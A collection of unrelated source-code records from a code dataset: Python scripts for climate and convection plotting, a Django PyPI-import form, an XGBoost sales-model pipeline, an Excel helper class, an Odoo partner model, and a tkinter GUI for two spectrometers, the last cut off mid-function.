(var*weights).sel(lat=slice(-5,5), lon=slice(130, 280)).mean(dim='lat')\nhov_nino = hov_nino.rename(r'$Temp~Anomalies~[^oC]$')\nfig=plt.figure(1, figsize=(8,10))\nax=fig.add_subplot(111)\np = hov_nino.plot.contourf(ax=ax, \n extend='both',\n cmap='RdBu_r', \n vmin=-1.5, vmax=1.5, levels=31,\n cbar_kwargs={'drawedges': True, 'shrink' : 0.80})\nfig.savefig(surf_path+'/Figures/'+variable+'_hovmoller_ORCA-0.25x0.25_regular_1979_2018.png', dpi=300, transparent=True)\nplt.show()\n\n","sub_path":"Hovmoller.py","file_name":"Hovmoller.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"577869150","text":"import pkg_resources\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\n\nimport importer.tasks\n\n\nclass RequiresForm(forms.Form):\n requirements = forms.CharField(widget=forms.Textarea,\n help_text='Paste your requirements.txt')\n recursive = forms.BooleanField(required=False, initial=True,\n help_text=\"Recurse through requirements' requirements, etc.\")\n\n def clean_requirements(self):\n requirements = self.cleaned_data['requirements']\n for line in requirements.splitlines():\n if line.strip().startswith('['):\n raise forms.ValidationError(\"Sections aren't supported\")\n\n try:\n list(pkg_resources.parse_requirements(requirements))\n except ValueError as e:\n raise forms.ValidationError(u' '.join(e))\n\n return requirements\n\n\n@require_http_methods(['HEAD', 'GET', 'POST'])\ndef index(request):\n if request.method == 'POST':\n form = RequiresForm(request.POST)\n if form.is_valid():\n importer.tasks.ensure_requirements.delay(\n form.cleaned_data['requirements'],\n form.cleaned_data['recursive'])\n return HttpResponseRedirect('/')\n else:\n form = RequiresForm()\n\n return render(request, 'importer/index.html', {\n 'title': 'Import packages from PyPI',\n 'form': form,\n })\n","sub_path":"yolapi/importer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"309240861","text":"import pandas as pd\nfrom pipeline.my_pipe import MyPipeline\nfrom util_functions import *\n\nxgb_params = {\n \"max_depth\":6,\n \"learning_rate\":0.25,\n \"n_estimators\":10,\n \"objective\":'binary:logistic',\n \"booster\":'gbtree',\n \"n_jobs\":4,\n \"nthread\":None,\n \"gamma\":0,\n \"min_child_weight\":1,\n \"max_delta_step\":0,\n \"subsample\":1,\n \"colsample_bytree\":1,\n \"colsample_bylevel\":1,\n \"reg_alpha\":0,\n \"reg_lambda\":1,\n \"scale_pos_weight\":1,\n \"base_score\":0.5,\n \"random_state\":0,\n \"seed\":None,\n \"missing\":None,\n \"use_label_encoder\":False,\n \"eval_metric\":\"logloss\"\n } \n\n# Columnas Borradas al Comienzo\ncolumns_filtered = [\n #\"Account_Created_Date\",\n #\"Last_Activity\",\n #\n \"ID\", # Useless\n \"Submitted_for_Approval\", # Empty\n \"Opportunity_Name\", # Useless\n \"Sales_Contract_No\", # Leakage\n \"Last_Activity\", # Empty\n \"Prod_Category_A\", # Empty\n \"Brand\", # Maybe-Useless\n \"Product_Type\", # Maybe-Useless\n \"Size\", # Maybe-Useless\n \"Product_Category_B\", # Maybe-Useless\n \"Price\", # Maybe-Useless\n \"Currency\", # Maybe-Useless\n \"Product_Family\", # High Cardinality, Low Importance\n \"Account_Name\" # High Cardinality, Might make noise\n \"Account_Owner\", # High Cardinality, Might make noise\n \"Opportunity_Owner\", # High Cardinality, Might make noise\n \"Billing_Country\" # High Cardinality, Might make noise\n ]\n\n# Columnas Borradas al final\ncolumns_removed = [\n \"Opportunity_Created_Date\", # Leakage\n \"Planned_Delivery_Start_Date\", # Engineered\n \"Planned_Delivery_End_Date\", # Engineered\n \"Total_Taxable_Amount\", # Replaced\n \"Opportunity_ID\" # Irrelevant\n ]\n\ncolumns_to_label = [\n \"Quote_Type\",\n]\n\ncolumns_to_one_hot = [\n \"Region\",\n \"Bureaucratic_Code\",\n \"Account_Type\",\n \"Opportunity_Type\",\n \"Delivery_Terms\",\n ]\n\ndef preprocess(pipe, X):\n # Remove ignored columns\n pipe.apply_column_filter(columns_filtered)\n pipe.apply_pre_function(prefix_columns)\n pipe.apply_pre_function(fill_nones)\n\n # Change types to correct value\n preprocess_dates(pipe)\n\n # Apply data filling\n impute_all(pipe, X, set(columns_filtered))\n pipe.apply_labeling(columns_to_label)\n pipe.apply_one_hot(columns_to_one_hot)\n\n # Apply various functions\n pipe.apply_function(delete_old_registers)\n pipe.apply_function(insert_negotiation_length)\n pipe.apply_function(insert_client_age)\n pipe.apply_function(preprocess_amounts_blocks)\n pipe.apply_function(preprocess_delivery_dates)\n pipe.apply_function(sort_by_dates)\n pipe.apply_function(unify_coins)\n pipe.apply_function(groupby_opp_id)\n pipe.apply_function(drop_categoricals)\n\n # Remove non-numerical columns\n pipe.apply_remove_columns(columns_removed)\n\n\ndef main():\n X_train = pd.read_csv(\"../Datos/Train_TP2_Datos_2020-2C.csv\")\n X_test = pd.read_csv(\"../Datos/Test_TP2_Datos_2020-2C.csv\")\n\n X_train = X_train.loc[(X_train[\"Stage\"] == \"Closed Won\")|(X_train[\"Stage\"] == \"Closed Lost\"),:]\n X_train[\"Stage\"] = X_train['Stage'].apply(lambda x: 1 if x == 'Closed Won' else 0)\n\n pipe = MyPipeline(X_train, X_test)\n\n preprocess(pipe, X_train)\n set_xgb_model(pipe, xgb_params)\n pipe.set_time_folds(10)\n pipe.preprocess()\n pipe.train_xgb(verbose=True)\n #pipe.predict()\n pipe.score_xgb(verbose=True)\n pipe.output()\n #pipe.submit()\n print(\"TODO OK\")\n\nmain()\n","sub_path":"Tp 2/Modelos/boost_model_v19.py","file_name":"boost_model_v19.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"583703422","text":"tab = ['zero ', 'jeden ', 'dwa ', 'trzy ', 'cztery ', 'pięć ', 'sześć ', 'siedem ', 'osiem ', 'dziewięć ']\nli = input('Liczba: ')\ndl = len(li)\nwynik = ''\npom = 0\n\nfor x in range(dl):\n pom = int(li[x])\n wynik += tab[pom]\n \nprint(f'{li} - {wynik}')\n \n \n\n\n","sub_path":"02-ControlStructures/02.33..py","file_name":"02.33..py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304538129","text":"# -*- coding:utf-8 -*-\n\n__author__ = \"Lakisha\"\n\nimport os\nfrom openpyxl import Workbook, load_workbook\n\n#excel自定义封装\nclass LQOpenXL:\n def __init__(self, path, read_only=False):\n self.wb = None\n if os.path.exists(path):\n self.path = path\n self.wb = load_workbook(self.path, read_only=read_only)\n else:\n print(\"%s 文件不存在\"%path)\n exit(0)\n\n #获取excel的行数\n def get_cell_row(self, sheet):\n if self.wb:\n #先通过sheet获取工作簿\n sh = self.wb.get_sheet_by_name(sheet)\n if sh:\n return sh.max_row\n return None\n\n #获取excel的列数\n def get_cell_col(self, sheet):\n if self.wb:\n #先通过sheet获取工作簿\n sh = self.wb.get_sheet_by_name(sheet)\n if sh:\n return sh.max_column\n return None\n\n #获取工作簿名称列表\n def get_sheets_name(self):\n if self.wb:\n return self.wb.get_sheet_names()\n return None\n\n #通过索引获取工作簿名\n def get_sheet_name_by_index(self, index):\n if self.wb:\n sheets = self.wb.get_sheet_names()\n sheet_len = len(sheets)\n\n if index >= 0 and index < sheet_len:\n return sheets[index]\n return None\n\n # 创建工作簿\n def creat_sheet(self, name, index=0):\n res = False\n if self.wb:\n self.wb.create_sheet(title=name, index=index)\n res = True\n return res\n\n #修改工作簿名\n def set_sheet_name(self, sheet_name, name):\n res = False\n if self.wb:\n self.wb[sheet_name].title = name\n res = True\n return res\n\n #获取单元格值\n def get_cell_value(self,sheet, row, column):\n value = None\n if self.wb:\n value = self.wb[sheet].cell(row=row, column=column).value\n return value\n\n #设置单元格值\n def set_cell_value(self, sheet, row, col, value):\n res = False\n if self.wb:\n self.wb[sheet].cell(row=row, column=col).value = value\n res = True\n return res\n\n def save(self, path=\"\"):\n if path !=\"\":\n self.path = path\n if self.wb:\n self.wb.save(self.path)\n\nif __name__ == \"__main__\":\n print(\"python openxl基本实例\")\n print(\"---\"*20, end=\"\\n\")\n\n xl = LQOpenXL(\"openpyxl_demo.xlsx\")\n\n #获取所有工作簿名\n sheets = xl.get_sheets_name()\n print(\"获取的工作簿列表\", sheets, end=\"\\n\")\n\n #获取工作簿中所有的数据\n for sheet in sheets:\n nrows = xl.get_cell_row(sheet)\n ncols = xl.get_cell_col(sheet)\n print(\"---\"*20, end=\"\\n\")\n for row in range(1, nrows+1):\n for col in range(1, ncols+1):\n value = xl.get_cell_value(sheet, row, col)\n print(\"[%d, %d]->%s\" % (row, col, value), end=\"\\t\")\n\n #修改各工作簿第一行的数据为:DeepTest\n for sheet in sheets:\n ncols = xl.get_cell_col(sheet)\n for col in range(1, ncols+1):\n xl.set_cell_value(sheet,row=1,col=col, value=\"DeetTest\")\n\n xl.save()","sub_path":"第一期/无锡-慕兮/Task3/day_5/LQOpenxl.py","file_name":"LQOpenxl.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"562010808","text":"# -*- coding: utf-8 -*-\n###############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2015 - Today => Morales Rosas\n#\n###############################################################################\n#\n# Coded by: Lázaro Rodríguez Triana\n# Skype : lazarus.d\n# E-mail: lazaro@outlook.com\n###############################################################################\n\n\nfrom openerp import models, fields, api, _\nfrom datetime import date, datetime\nimport time\n\n\nclass ClienteTipo(models.Model):\n\n _name = 'cliente.tipo'\n\n name = fields.Char(string='Tipo')\n\n\nclass PaqueteContratado(models.Model):\n\n _name = 'paquete.contratado'\n\n name = fields.Char(string='Paquete')\n\n\nclass AniosRegalo(models.Model):\n\n _name = 'anios.regalo'\n\n name = fields.Char(string='Años')\n\n\nclass ResPartner(models.Model):\n\n _inherit = 'res.partner'\n\n cliente_tipo = fields.Many2one(\n comodel_name='cliente.tipo',\n string='Tipo')\n multi_pago = fields.Selection([\n ('no', 'No'),\n ('si', 'Si'),\n ], string='Multipago')\n paquete = fields.Many2one(\n comodel_name='paquete.contratado',\n string='Paquete contratado')\n anio_regalo = fields.Many2one(\n comodel_name='anios.regalo',\n string='Años regalo')\n\n asegurado_ids = fields.One2many(\n comodel_name='res.partner.asegurado',\n inverse_name='partner_id',\n string='Asegurados')\n\n\nclass ResPartnerAsegurado(models.Model):\n\n _name = 'res.partner.asegurado'\n\n fecha_ingreso = fields.Date(string='Fecha Ingreso')\n name = fields.Char(string='Nombre del asegurado')\n odontograma = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Odontograma')\n historia_clinica = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Historia Clínica')\n contrato = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Contrato')\n consentimiento = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Consentimiento')\n aviso = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Aviso')\n comentarios = fields.Text(string='Comentarios')\n fecha_kit = fields.Date(string='Fecha de entrega Kit')\n responsable_kit = fields.Char(string='Responsable del Kit')\n numero_certificado = fields.Char(string='Número de certificado')\n status_asegurado = fields.Selection([\n ('criopreservado', 'Criopreservado'),\n ('baja', 'Baja'),\n ], string='Status asegurado')\n code = fields.Char(string='Código')\n partner_id = fields.Many2one(\n comodel_name='res.partner',\n string='Partner')\n","sub_path":"moralesrosas_store_cell_partner/models/partner.py","file_name":"partner.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"119532542","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyvista as pv\nimport os\nimport sys\n\n# Set figure font globally to serif\nplt.rcParams[\"font.family\"] = \"serif\"\n\n# Change default figure DPI; remove for lower DPI displays (default = 100dpi)\nplt.rcParams[\"figure.dpi\"] = 250 \n\ndef main():\n # time start, end etc.\n start = 670\n end = 677.5\n dt = 0.5\n times = np.arange(start,end+dt,dt)\n \n # fluid & domain properties\n deltaB = 0.0654\n kappa = 3.041e-06\n H = 1.0\n \n for time in times:\n print(\"Time = %.12g\" % (time))\n print(\"Loading fields\")\n ## grid is the central object in VTK where every field is added on to grid\n grid = pv.UnstructuredGrid(\"./VTK/Ra_1e+10_H1_gradedMeshDNS_init_Y800_X1600_t670_%.12g.vtk\" % (time)) \n \n # get cell points\n points = grid.points\n xPts = np.unique(points[:,0])\n yPts = np.unique(points[:,1])\n zPts = np.unique(points[:,2])\n\n # get cell centbuoyancy_cellCentre_t670.pngres\n centres = grid.cell_centers().points\n xCts = np.unique(centres[:,0])\n yCts = np.unique(centres[:,1])\n zCts = np.unique(centres[:,2])\n \n # load buoyancy (permuted to change indexing: Y, Z, X -> X, Y, Z)\n b = np.transpose(grid.cell_arrays['b'].reshape((len(yCts),len(zCts),len(xCts))),(2,0,1))\n bf = np.transpose(grid.point_arrays['b'].reshape((len(yPts),len(zPts),len(xPts))),(2,0,1))\n u = np.transpose(grid.cell_arrays['u'].reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3))\n gradB = np.transpose(grid.cell_arrays['grad(b)'].reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3))\n \n ## calculate heat flux & add to VTK grid\n heatFlux = grid.cell_arrays['u']*grid.cell_arrays['b'][:,np.newaxis] - kappa*grid.cell_arrays['grad(b)']\n grid._add_cell_array(heatFlux, 'heatFlux')\n # normalise & convert to numpy for plotting\n heatFlux = np.transpose(heatFlux.reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3)) / ( kappa*deltaB / H )\n \n # plot\n print(\"Plotting buoyancy\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(b[:,0,:].transpose() / deltaB),cmap=\"magma\")\n plt.colorbar(label=r\"$b\\ /\\ \\Delta B$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"buoyancy_cellCentre_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n plt.figure(figsize=(10,5))\n plt.pcolormesh(xPts,zPts,(bf[:,0,:].transpose() / deltaB),cmap=\"magma\")\n plt.colorbar(label=r\"$b\\ /\\ \\Delta B$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"buoyancy_cellFace_t%.12g.png\" % (np.where(time == time)[0][0]))\n plt.close()\n \n print(\"Plotting vertical velocity\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(u[:,0,:,2].transpose() / np.sqrt(deltaB*H)),cmap=\"RdBu_r\")\n plt.colorbar(label=r\"$w\\ /\\ \\sqrt{\\Delta B\\ H}$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"w_cellCentre_t%.12g.png\" % (np.where(time == time)[0][0]))\n plt.close()\n \n print(\"Plotting heat flux\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(heatFlux[:,0,:,2].transpose()),cmap=\"magma\")\n plt.colorbar(label=r\"Nu\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"heatFlux_cellCentre_t%.12g.png\" % (np.where(time == time)[0][0]))\n plt.close()\n \n plt.figure(figsize=(10,5))\n plt.plot(np.mean(heatFlux[:,0,:,2], axis=0), zCts)\n plt.ylabel(r\"$z\\ /\\ H$\")\n Nu = np.average(np.mean(heatFlux[:,0,:,2], axis=0), weights=np.diff(zPts))\n print(\"Nu = %f\" % (Nu))\n plt.title(\"Nu = %f\" % (Nu))\n plt.savefig(\"heatFlux_cellCentre_zProfile_t%.12g.png\" % (np.where(time == time)[0][0]))\n plt.close()\n \n print(\"End\")\n\n return 0;\n\nmain()\n\n","sub_path":"partitioned/RayleighBenard/singleColumn/Ra_1e+10_multiFluidBoussinesqFoam_symmetricBCs_nonUniformSigma_sigmaConst_0_5_divTransfer_gamma_2_e-4_noDrag_buoyancyAnomaly_meanFactor_0_spinUp_energyDimPressureTerm_CN_0_55_largeDeltaT/get2Dfields.py","file_name":"get2Dfields.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"562572125","text":"'''\n\nThis program is designed to control two Ocean Optics Spectrometers simultaneously, with \nseparate control over coadding and integration time. \n\nCreated: August 2017\n\nLast update: August 2017\n\nContact: Ben Esse, Postgraduate Research Student, University of Manchester\nEmail: benjamin.esse@manchester.ac.uk\n\n'''\n\n# Import required libraries\nfrom tkinter import ttk\nimport tkinter as tk\nimport os\nimport seabreeze.spectrometers as sb\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport numpy as np\nimport datetime\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom threading import Thread\nfrom queue import Queue\n\nfrom updash_lib.read_spectro_thread import read_spectro\nfrom updash_lib.file_control import make_directory\n\n# Define some fonts to use in the program\nNORM_FONT = ('Verdana', 10)\nLARG_FONT = ('Verdana', 12, 'bold')\n\nclass mygui(tk.Tk):\n \n def __init__(self, *args, **kwargs):\n \n # Create GUI in the backend\n tk.Tk.__init__(self, *args, **kwargs)\n \n # Add a title and an icon\n tk.Tk.wm_title(self, 'Dual Spectrometer Gui')\n tk.Tk.iconbitmap(self, default = 'logo.ico')\n \n # Create the container to hold the gui\n container = tk.Frame(self)\n container.grid()\n container.grid_rowconfigure(0, weight = 1)\n container.grid_columnconfigure(0, weight = 1)\n\n#========================================================================================\n#================================Set initial fit parameters==============================\n#========================================================================================\n\n # Set running to false. This parameter controls whether the program is acquiring\n # spectra or not\n self.running = False\n \n # Find spectrometerss connected to the computer\n self.devices = sb.list_devices()\n\n # If no devices are connected then set string to show. Else assign first to spec\n if len(self.devices) == 0:\n self.spec = 0\n self.spec_name0 = 'No devices connected'\n self.spec_name1 = 'No devices connected'\n self.devices = ['No devices connected']\n else:\n self.spec0 = sb.Spectrometer(self.devices[0])\n self.spec_name0 = str(self.spec0.serial_number)\n self.spec1 = sb.Spectrometer(self.devices[1])\n self.spec_name1 = str(self.spec1.serial_number)\n \n#========================================================================================\n#================================Define acquisition params===============================\n#========================================================================================\n \n#====================================First Spectrometer==================================\n \n # Create label to display the spectrometer name\n self.label_dev0 = ttk.Label(self, text=\"Device: \" + str(self.spec_name0), \n font = NORM_FONT)\n self.label_dev0.grid(row=0, column=0, pady=5, padx=5, columnspan=2)\n \n # Create label and entry to control the integration time\n self.integration_time0 = tk.StringVar(value = 100)\n self.label_intime0 = ttk.Label(self, text = 'Integration time (ms):', \n font = NORM_FONT)\n self.label_intime0.grid(row=9, column=0, pady=5, padx=10, sticky='E')\n self.ent_intime0 = ttk.Entry(self, textvariable = self.integration_time0)\n self.ent_intime0.grid(row=9, column=1, pady=5, padx=10, sticky='W')\n \n # Create label and entry to control the number of coadds\n self.coadds0 = tk.StringVar(value = 10)\n self.label_coadds0 = ttk.Label(self,text = 'Number of coadds:', font = NORM_FONT)\n self.label_coadds0.grid(row=10, column=0, pady=5, padx=10, sticky='E')\n self.ent_coadds0 = ttk.Entry(self, textvariable = self.coadds0)\n self.ent_coadds0.grid(row=10, column=1, pady=5, padx=10, sticky='W')\n \n # Create label, entry to control the number of dark spectra to take\n self.dark_no0 = tk.IntVar(value = 10)\n self.label_dark0 = ttk.Label(self, text = 'Number of dark spectra:',\n font = NORM_FONT)\n self.label_dark0.grid(row=11, column=0, pady=5, padx=10, sticky='E')\n self.ent_dark0 = ttk.Entry(self, textvariable = self.dark_no0)\n self.ent_dark0.grid(row=11, column=1, pady=5, padx=10, sticky='W') \n\n#====================================Second Spectrometer=================================\n \n # Create label to display the spectrometer name\n self.label_dev1 = ttk.Label(self, text=\"Device: \" + str(self.spec_name1), \n font = NORM_FONT)\n self.label_dev1.grid(row=0, column=2, pady=5, padx=5, columnspan=2)\n\n # Create label and entry to control the integration time\n self.integration_time1 = tk.StringVar(value = 100)\n self.label_intime1 = ttk.Label(self, text = 'Integration time (ms):',\n font = NORM_FONT)\n self.label_intime1.grid(row=9, column=2, pady=5, padx=10, sticky='E')\n self.ent_intime1 = ttk.Entry(self, textvariable = self.integration_time1)\n self.ent_intime1.grid(row=9, column=3, pady=5, padx=10, sticky='W')\n \n # Create label and entry to control the number of coadds\n self.coadds1 = tk.StringVar(value = 10)\n self.label_coadds1 = ttk.Label(self,text = 'Number of coadds:', font = NORM_FONT)\n self.label_coadds1.grid(row=10, column=2, pady=5, padx=10, sticky='E')\n self.ent_coadds1 = ttk.Entry(self, textvariable = self.coadds1)\n self.ent_coadds1.grid(row=10, column=3, pady=5, padx=10, sticky='W')\n \n # Create label, entry to control the number of dark spectra to take\n self.dark_no1 = tk.IntVar(value = 10)\n self.label_dark1 = ttk.Label(self, text = 'Number of dark spectra:', \n font = NORM_FONT)\n self.label_dark1.grid(row=11, column=2, pady=5, padx=10, sticky='E')\n self.ent_dark1 = ttk.Entry(self, textvariable = self.dark_no1)\n self.ent_dark1.grid(row=11, column=3, pady=5, padx=10, sticky='W')\n \n \n \n # Create label and entry to control the filepath to save the spectra to\n fpath_str = 'Results/' + str(datetime.date.today()) + '/spectro_gui_out/'\n self.file_path = tk.StringVar(value = fpath_str)\n self.label_fp = ttk.Label(self, text = 'File path:', font = NORM_FONT)\n self.label_fp.grid(row=6, column=5, pady=5, padx=10, sticky='E')\n self.ent_fp = ttk.Entry(self, textvariable = self.file_path)\n self.ent_fp.grid(row=6, column=6, pady=5, padx=10, sticky='W')\n \n#========================================================================================\n#===============================Create buttons to control app============================\n#========================================================================================\n\n # Create button to start and stop acquisition\n self.start_button = tk.Button(self, text = 'START',\n command = self.start_stop, width = 14, height = 3, \n font = LARG_FONT, bg = 'green')\n self.start_button.grid(row=1, column=5, pady=5, padx=5, columnspan = 2)\n\n # Create button to read once from the spectrometer\n self.acquire_button = tk.Button(self,text=\"Read single\",command=self.read_single,\n width = 14, height = 3, font = LARG_FONT)\n self.acquire_button.grid(row=2, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to read the dark spectra\n self.dark_button = tk.Button(self, text=\"Read dark\", command=self.read_dk,\n width = 14, height = 3, font = LARG_FONT)\n self.dark_button.grid(row=3, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to update the filepath to save spectra to\n self.button_fp = tk.Button(self, text = 'Update filepath',\n command = self.folder_update, width = 14, height = 3,\n font = LARG_FONT)\n self.button_fp.grid(row=4, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to close the window\n self.close_button = tk.Button(self, text=\"Close\", command=self.quit, width = 14, \n height = 3, font = LARG_FONT)\n self.close_button.grid(row=5, column=5, pady=5, padx=5, columnspan = 2)\n\n#========================================================================================\n#============================Create text box to print updates============================\n#========================================================================================\n \n # Create a scroll bar\n scrollbar = ttk.Scrollbar(self)\n scrollbar.grid(row=7, column=8, rowspan = 6, sticky='NSE')\n\n # Create a text box to log messages for the user\n self.textbox = tk.Text(self, width = 40, height = 10, font = NORM_FONT,\n yscrollcommand = scrollbar.set)\n self.textbox.grid(row = 7, column = 5, columnspan = 2, rowspan = 6)\n \n # Connect the scrollbar to the textbox\n scrollbar.config(command = self.textbox.yview)\n \n#========================================================================================\n#====================================Create plot canvas==================================\n#======================================================================================== \n \n # Create figure to hold the graphs\n plt.rcParams.update({'font.size': 10} )\n self.fig = plt.figure(figsize = (10,5))\n gs = gridspec.GridSpec(1,2)\n \n # Create plot axes\n self.ax0 = self.fig.add_subplot(gs[0])\n self.ax1 = self.fig.add_subplot(gs[1])\n \n # Set axis labels\n self.ax0.set_ylabel('Intensity (arb)')\n self.ax0.set_xlabel('Wavelength (nm)')\n \n self.ax1.set_xlabel('Wavelength (nm)')\n \n # Create lines to plot data series\n \n # Spectral data\n self.line0, = self.ax0.plot(0, 0, 'b')\n self.line1, = self.ax1.plot(0, 0, 'b')\n \n # Pack into arrays to pass to plotting function\n self.lines = [self.line0, self.line1]\n self.axes = [self.ax0, self.ax1 ]\n \n # Make it look nice\n plt.tight_layout()\n \n # Create the canvas to hold the graph in the GUI\n self.canvas = FigureCanvasTkAgg(self.fig, self)\n self.canvas.show()\n self.canvas.get_tk_widget().grid(row=1,column=0,padx=10,\n columnspan = 4, rowspan = 7)\n \n '''\n # Add matplotlib toolbar above the plot canvas\n toolbar_frame = tk.Frame(self, bg = 'black') \n toolbar_frame.grid(row=0,column=3, sticky = 'W') \n toolbar = NavigationToolbar2TkAgg(self.canvas, toolbar_frame)\n toolbar.update()\n '''\n \n#========================================================================================\n#==================================Make output directory=================================\n#========================================================================================\n \n # Create directory to hold program outputs\n self.results_folder = self.ent_fp.get()\n \n # Create the directory, changing the name to avoid overwritting data\n self.results_folder = make_directory(self.results_folder)\n \n # Update the filepath in the GUI\n self.ent_fp.delete(0, len(self.ent_fp.get()))\n self.ent_fp.insert(0,str(self.results_folder))\n \n # Create notes text file to log changes in bg/dark or other things\n notes_fname = self.ent_fp.get() + 'notes.txt'\n \n # Create notes file\n with open(notes_fname, 'w') as w:\n w.write('Notes file for dual_spectro_run.py output\\n\\n') \n \n#========================================================================================\n#==================================Start acquire looping=================================\n#======================================================================================== \n \n # Define arrays to hold so2 amounts and spectra number for plotting \n self.so2_amts = np.array(())\n self.loops = np.array(())\n\n # Create loop counter\n self.loop = 0\n \n # Call acquire after a second, it will loop in the background\n self.acquire()\n \n#======================================================================================== \n#========================================================================================\n#======================================Define functions==================================\n#========================================================================================\n#======================================================================================== \n\n\n\n#========================================================================================\n#========================================update text=====================================\n#========================================================================================\n\n # Define function to output text to the textbox and the notes file\n def write_text(self,text):\n \n # Add new line return to text\n text = text + '\\n\\n'\n \n # Write text with a new line\n self.textbox.insert(tk.END, text)\n \n # Scroll if needed\n self.textbox.see(tk.END)\n \n # Update notes file\n with open(self.ent_fp.get() + 'notes.txt', 'a') as a:\n a.write(text)\n \n#========================================================================================\n#=======================================folder_update====================================\n#========================================================================================\n\n # Define function to update the filepath input by the user\n def folder_update(self):\n \n # Create directory to hold data in\n self.results_folder = self.ent_fp.get()\n \n # Create the directory \n self.results_folder = make_directory(self.results_folder)\n \n self.ent_fp.delete(0, len(self.ent_fp.get()))\n self.ent_fp.insert(0,str(self.results_folder))\n \n # Create notes file\n with open(self.ent_fp.get() + 'notes.txt', 'w') as w:\n w.write('Notes file for dual_spectro_run.py output\\n\\n')\n \n#========================================================================================\n#=====================================Read spectro once==================================\n#========================================================================================\n\n # Read spectrometer once and display \n def read_single(self):\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n \n # Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Plot spectra\n self.line0.set_data(x0, y0)\n self.ax0.set_xlim(x0.min(), x0.max())\n self.ax0.set_ylim(y0.min(), y0.max())\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min(), x1.max())\n self.ax1.set_ylim(y1.min(), y1.max())\n self.canvas.draw()\n\n#========================================================================================\n#======================================Read dark spectra=================================\n#========================================================================================\n \n # Read the dark spectra \n def read_dk(self):\n \n # Update notes file\n self.write_text('Begin reading dark')\n print('Begin reading dark')\n \n # Create zero array to hold dark spectra\n self.dark0 = np.zeros(2048)\n self.dark1 = np.zeros(2048)\n \n # Define dark filepath\n dark_fp0 = self.ent_fp.get() + self.spec_name0 + '/dark/'\n dark_fp1 = self.ent_fp.get() + self.spec_name1 + '/dark/'\n \n # Create the directory \n dark_fp0 = make_directory(dark_fp0)\n dark_fp1 = make_directory(dark_fp1)\n \n # Loop over number of darks to collect\n for i in range(int(self.ent_dark0.get())):\n \n # Create filename\n n = str('{num:05d}'.format(num=i))\n fname0 = dark_fp0 + 'spectrum_' + n + '.txt'\n fname1 = dark_fp1 + 'spectrum_' + n + '.txt'\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n \n # 